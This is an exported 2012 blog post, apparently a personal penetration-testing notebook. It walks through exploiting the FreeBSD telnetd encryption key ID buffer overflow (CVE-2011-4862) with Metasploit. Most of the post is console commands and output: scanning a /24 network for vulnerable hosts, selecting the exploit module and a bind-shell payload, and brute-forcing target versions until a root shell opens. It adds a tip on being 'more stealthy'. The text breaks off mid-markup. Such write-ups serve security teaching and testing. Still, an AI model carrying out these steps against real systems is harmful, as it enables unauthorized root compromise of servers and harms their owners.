{"id":335,"date":"2012-01-18T17:05:11","date_gmt":"2012-01-18T16:05:11","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=335"},"modified":"2012-02-03T09:33:09","modified_gmt":"2012-02-03T08:33:09","slug":"freebsd-derived-telnetd-service-exploit","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/01\/18\/freebsd-derived-telnetd-service-exploit\/","title":{"rendered":"FreeBSD Derived telnetd service Exploit"},"content":{"rendered":"<p>Mentioned by hdm <a href=\"http:\/\/community.rapid7.com\/community\/solutions\/metasploit\/blog\/2011\/12\/27\/bsd-telnet-daemon-encrypt-key-id-overflow\" target=\"_blank\">here<\/a> and <a href=\"http:\/\/community.rapid7.com\/community\/solutions\/metasploit\/blog\/2011\/12\/28\/more-fun-with-bsd-derived-telnet-daemons\" target=\"_blank\">here<\/a> but I wanted to make a note of this myself.<br \/>\nFirst thing to do is setup the scan to look for vulnerable telnetd services:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf <span class=\"sy0\">&gt;<\/span> use auxiliary<span class=\"sy0\">\/<\/span>scanner<span class=\"sy0\">\/<\/span>telnet<span class=\"sy0\">\/<\/span>telnet_encrypt_overflow<br \/>\nmsf &nbsp;auxiliary<span class=\"br0\">&#40;<\/span>telnet_encrypt_overflow<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> RHOSTS 192.168.0.0<span class=\"sy0\">\/<\/span><span class=\"nu0\">24<\/span><br \/>\nRHOSTS =<span class=\"sy0\">&gt;<\/span> 192.168.0.0<span class=\"sy0\">\/<\/span><span class=\"nu0\">24<\/span><br \/>\nmsf &nbsp;auxiliary<span class=\"br0\">&#40;<\/span>telnet_encrypt_overflow<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> THREADS <span class=\"nu0\">64<\/span><br \/>\nTHREADS =<span class=\"sy0\">&gt;<\/span> <span class=\"nu0\">64<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And now to run the scan<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf &nbsp;auxiliary<span class=\"br0\">&#40;<\/span>telnet_encrypt_overflow<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> run<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> 192.168.0.1:<span class=\"nu0\">23<\/span> Does not support encryption: Netgear Embedded Telnet Server <span class=\"br0\">&#40;<\/span>c<span class=\"br0\">&#41;<\/span> <span class=\"nu0\">2000<\/span>-<span class=\"nu0\">2007<\/span>\\x0a\\x0aWARNING: &nbsp;Access allowed by authorized <span class=\"kw2\">users<\/span> only.\\x0a\\x0alogin: \\x0aERROR - Your telnet client rejected our request to use char-at-a-time mode<span class=\"sy0\">!<\/span>\\x0aUnable to operate under this condition.\\r\\x0a\\x0a\\x0a\\x0aYour telnet session has expired due to inactivity... <br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> 192.168.0.13:<span class=\"nu0\">23<\/span> VULNERABLE: FreeBSD<span class=\"sy0\">\/<\/span>i386 <span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span> <span class=\"br0\">&#40;<\/span>ttyp0<span class=\"br0\">&#41;<\/span>\\x0d\\x0a\\x0d\\x0alogin:<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned 026 of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>010<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned 053 of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>020<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned 087 of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>033<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned <span class=\"nu0\">105<\/span> of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>041<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned <span class=\"nu0\">132<\/span> of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>051<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned <span class=\"nu0\">196<\/span> of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>076<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned <span class=\"nu0\">213<\/span> of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>083<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned <span class=\"nu0\">224<\/span> of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>087<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned <span class=\"nu0\">235<\/span> of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span>091<span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Scanned <span class=\"nu0\">256<\/span> of <span class=\"nu0\">256<\/span> hosts <span class=\"br0\">&#40;<\/span><span class=\"nu0\">100<\/span><span class=\"sy0\">%<\/span> <span class=\"kw3\">complete<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auxiliary module execution completed<br \/>\nmsf &nbsp;auxiliary<span class=\"br0\">&#40;<\/span>telnet_encrypt_overflow<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Looks like 192.168.0.13 is vulnerable, what a surprise.<br \/>\nThe exploit we need to use here is exploit\/freebsd\/telnet\/telnet_encrypt_keyid:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/>33<br \/>34<br \/>35<br \/>36<br \/>37<br \/>38<br \/>39<br \/>40<br \/>41<br \/>42<br \/>43<br \/>44<br \/>45<br \/>46<br \/>47<br \/>48<br \/>49<br \/>50<br \/>51<br \/>52<br \/>53<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> info<br \/>\n<br \/>\n&nbsp; &nbsp; &nbsp; &nbsp;Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow<br \/>\n&nbsp; &nbsp; &nbsp;Module: exploit<span class=\"sy0\">\/<\/span>freebsd<span class=\"sy0\">\/<\/span>telnet<span class=\"sy0\">\/<\/span>telnet_encrypt_keyid<br \/>\n&nbsp; &nbsp; Version: <span class=\"nu0\">0<\/span><br \/>\n&nbsp; &nbsp;Platform: BSD<br \/>\n&nbsp;Privileged: Yes<br \/>\n&nbsp; &nbsp; License: Metasploit Framework License <span class=\"br0\">&#40;<\/span>BSD<span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; &nbsp; &nbsp;Rank: Great<br \/>\n<br \/>\nProvided by:<br \/>\n&nbsp; Jaime Penalba Estebanez <span class=\"sy0\">&lt;<\/span>jpenalbae<span class=\"sy0\">@<\/span>gmail.com<span class=\"sy0\">&gt;<\/span><br \/>\n&nbsp; Brandon Perry <span class=\"sy0\">&lt;<\/span>bperry.volatile<span class=\"sy0\">@<\/span>gmail.com<span class=\"sy0\">&gt;<\/span><br \/>\n&nbsp; Dan Rosenberg<br \/>\n&nbsp; hdm <span class=\"sy0\">&lt;<\/span>hdm<span class=\"sy0\">@<\/span>metasploit.com<span class=\"sy0\">&gt;<\/span><br \/>\n<br \/>\nAvailable targets:<br \/>\n&nbsp; Id &nbsp;Name<br \/>\n&nbsp; <span class=\"re5\">--<\/span> &nbsp;<span class=\"re5\">----<\/span><br \/>\n&nbsp; <span class=\"nu0\">0<\/span> &nbsp; Automatic<br \/>\n&nbsp; <span class=\"nu0\">1<\/span> &nbsp; FreeBSD <span class=\"nu0\">8.2<\/span><br \/>\n&nbsp; <span class=\"nu0\">2<\/span> &nbsp; FreeBSD <span class=\"nu0\">8.1<\/span><br \/>\n&nbsp; <span class=\"nu0\">3<\/span> &nbsp; FreeBSD <span class=\"nu0\">8.0<\/span><br \/>\n&nbsp; <span class=\"nu0\">4<\/span> &nbsp; FreeBSD <span class=\"nu0\">7.3<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.4<\/span><br \/>\n&nbsp; <span class=\"nu0\">5<\/span> &nbsp; FreeBSD <span class=\"nu0\">7.0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.2<\/span><br \/>\n&nbsp; <span class=\"nu0\">6<\/span> &nbsp; FreeBSD <span class=\"nu0\">6.3<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.4<\/span><br \/>\n&nbsp; <span class=\"nu0\">7<\/span> &nbsp; FreeBSD <span class=\"nu0\">6.0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.2<\/span><br \/>\n&nbsp; <span class=\"nu0\">8<\/span> &nbsp; FreeBSD <span class=\"nu0\">5.5<\/span><br \/>\n&nbsp; <span class=\"nu0\">9<\/span> &nbsp; FreeBSD <span class=\"nu0\">5.3<\/span><br \/>\n<br \/>\nBasic options:<br \/>\n&nbsp; Name &nbsp; &nbsp; &nbsp;Current Setting &nbsp;Required &nbsp;Description<br \/>\n&nbsp; <span class=\"re5\">----<\/span> &nbsp; &nbsp; &nbsp;<span class=\"re5\">---------------<\/span> &nbsp;<span class=\"re5\">--------<\/span> &nbsp;<span class=\"re5\">-----------<\/span><br \/>\n&nbsp; PASSWORD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; no &nbsp; &nbsp; &nbsp; &nbsp;The password <span class=\"kw1\">for<\/span> the specified username<br \/>\n&nbsp; RHOST &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"kw2\">yes<\/span> &nbsp; &nbsp; &nbsp; The target address<br \/>\n&nbsp; RPORT &nbsp; &nbsp; <span class=\"nu0\">23<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class=\"kw2\">yes<\/span> &nbsp; &nbsp; &nbsp; The target port<br \/>\n&nbsp; USERNAME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; no &nbsp; &nbsp; &nbsp; &nbsp;The username to authenticate <span class=\"kw2\">as<\/span><br \/>\n<br \/>\nPayload information:<br \/>\n&nbsp; Space: <span class=\"nu0\">128<\/span><br \/>\n&nbsp; Avoid: <span class=\"nu0\">1<\/span> characters<br \/>\n<br \/>\nDescription:<br \/>\n&nbsp; This module exploits a buffer overflow <span class=\"kw1\">in<\/span> the encryption option <br \/>\n&nbsp; handler of the FreeBSD telnet service.<br \/>\n<br \/>\nReferences:<br \/>\n&nbsp; http:<span class=\"sy0\">\/\/<\/span>cve.mitre.org<span class=\"sy0\">\/<\/span>cgi-bin<span class=\"sy0\">\/<\/span>cvename.cgi?<span class=\"re2\">name<\/span>=<span class=\"nu0\">2011<\/span>-<span class=\"nu0\">4862<\/span><br \/>\n&nbsp; http:<span class=\"sy0\">\/\/<\/span>www.osvdb.org<span class=\"sy0\">\/<\/span><span class=\"nu0\">78020<\/span><br \/>\n&nbsp; http:<span class=\"sy0\">\/\/<\/span>www.securityfocus.com<span class=\"sy0\">\/<\/span>bid<span class=\"sy0\">\/<\/span><span class=\"nu0\">51182<\/span><br \/>\n&nbsp; http:<span class=\"sy0\">\/\/<\/span>www.exploit-db.com<span class=\"sy0\">\/<\/span>exploits<span class=\"sy0\">\/<\/span><span class=\"nu0\">18280<\/span><span class=\"sy0\">\/<\/span><br \/>\n<br \/>\nmsf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>The payload is limited to 128 characters so we only have a few options, shell is more than enough though!<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> show payloads<br \/>\n<br \/>\nCompatible Payloads<br \/>\n===================<br \/>\n<br \/>\n&nbsp; &nbsp;Name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Disclosure Date &nbsp;Rank &nbsp; &nbsp;Description<br \/>\n&nbsp; &nbsp;<span class=\"re5\">----<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"re5\">---------------<\/span> &nbsp;<span class=\"re5\">----<\/span> &nbsp; &nbsp;<span class=\"re5\">-----------<\/span><br \/>\n&nbsp; &nbsp;bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span><span class=\"kw3\">exec<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; normal &nbsp;BSD Execute Command<br \/>\n&nbsp; &nbsp;bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span>metsvc_bind_tcp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;normal &nbsp;FreeBSD Meterpreter Service, Bind TCP<br \/>\n&nbsp; &nbsp;bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span>metsvc_reverse_tcp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; normal &nbsp;FreeBSD Meterpreter Service, Reverse TCP Inline<br \/>\n&nbsp; &nbsp;bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span>shell<span class=\"sy0\">\/<\/span>bind_tcp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; normal &nbsp;BSD Command Shell, Bind TCP Stager<br \/>\n&nbsp; &nbsp;bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span>shell<span class=\"sy0\">\/<\/span>reverse_tcp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;normal &nbsp;BSD Command Shell, Reverse TCP Stager<br \/>\n&nbsp; &nbsp;bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span>shell_bind_tcp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; normal &nbsp;BSD Command Shell, Bind TCP Inline<br \/>\n&nbsp; &nbsp;bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span>shell_reverse_tcp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;normal &nbsp;BSD Command Shell, Reverse TCP Inline<br \/>\n&nbsp; &nbsp;generic<span class=\"sy0\">\/<\/span>custom &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; normal &nbsp;Custom Payload<br \/>\n&nbsp; &nbsp;generic<span class=\"sy0\">\/<\/span>debug_trap &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; normal &nbsp;Generic x86 Debug Trap<br \/>\n&nbsp; &nbsp;generic<span class=\"sy0\">\/<\/span>shell_bind_tcp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; normal &nbsp;Generic Command Shell, Bind TCP Inline<br \/>\n&nbsp; &nbsp;generic<span class=\"sy0\">\/<\/span>shell_reverse_tcp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;normal &nbsp;Generic Command Shell, Reverse TCP Inline<br \/>\n&nbsp; &nbsp;generic<span class=\"sy0\">\/<\/span>tight_loop &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; normal &nbsp;Generic x86 Tight Loop<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>We&#8217;ll select bsd\/x86\/shell\/bind_tcp to make things quick.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> payload bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span>shell<span class=\"sy0\">\/<\/span>bind_tcp<br \/>\npayload =<span class=\"sy0\">&gt;<\/span> bsd<span class=\"sy0\">\/<\/span>x86<span class=\"sy0\">\/<\/span>shell<span class=\"sy0\">\/<\/span>bind_tcp<br \/>\nmsf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> rhost 192.168.0.13<br \/>\nrhost =<span class=\"sy0\">&gt;<\/span> 192.168.0.13<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And now to exploit, note that it trys against all versions of FreeBSD from 5.5 to 8.2<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> exploit <span class=\"re5\">-j<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Exploit running <span class=\"kw2\">as<\/span> background job.<br \/>\n<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Brute forcing with <span class=\"nu0\">9<\/span> possible targets<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Trying target FreeBSD <span class=\"nu0\">8.2<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Started <span class=\"kw3\">bind<\/span> handler<br \/>\nmsf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Trying target FreeBSD <span class=\"nu0\">8.1<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Trying target FreeBSD <span class=\"nu0\">8.0<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Trying target FreeBSD <span class=\"nu0\">7.3<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.4<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Trying target FreeBSD <span class=\"nu0\">7.0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.2<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Trying target FreeBSD <span class=\"nu0\">6.3<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.4<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Trying target FreeBSD <span class=\"nu0\">6.0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.2<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Trying target FreeBSD <span class=\"nu0\">5.5<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending stage <span class=\"br0\">&#40;<\/span><span class=\"nu0\">46<\/span> bytes<span class=\"br0\">&#41;<\/span> to 192.168.0.13<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Command shell session <span class=\"nu0\">1<\/span> opened <span class=\"br0\">&#40;<\/span>192.168.0.8:<span class=\"nu0\">41452<\/span> -<span class=\"sy0\">&gt;<\/span> 192.168.0.13:<span class=\"nu0\">4444<\/span><span class=\"br0\">&#41;<\/span> at <span class=\"nu0\">2012<\/span>-01-<span class=\"nu0\">18<\/span> <span class=\"nu0\">11<\/span>:01:05 <span class=\"re5\">-0500<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Looks like we got shell<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> sessions <span class=\"re5\">-i<\/span> <span class=\"nu0\">1<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Starting interaction with <span class=\"nu0\">1<\/span>...<br \/>\n<br \/>\n<span class=\"kw2\">whoami<\/span><br \/>\nroot<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>To be more stealthy you could set the exploit code to the specific version of FreeBSD you&#8217;re targeting:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/><\/div><\/td><td><div class=\"bash codecolorer\">Available targets:<br \/>\n&nbsp; Id &nbsp;Name<br \/>\n&nbsp; <span class=\"re5\">--<\/span> &nbsp;<span class=\"re5\">----<\/span><br \/>\n&nbsp; <span class=\"nu0\">0<\/span> &nbsp; Automatic<br \/>\n&nbsp; <span class=\"nu0\">1<\/span> &nbsp; FreeBSD <span class=\"nu0\">8.2<\/span><br \/>\n&nbsp; <span class=\"nu0\">2<\/span> &nbsp; FreeBSD <span class=\"nu0\">8.1<\/span><br \/>\n&nbsp; <span class=\"nu0\">3<\/span> &nbsp; FreeBSD <span 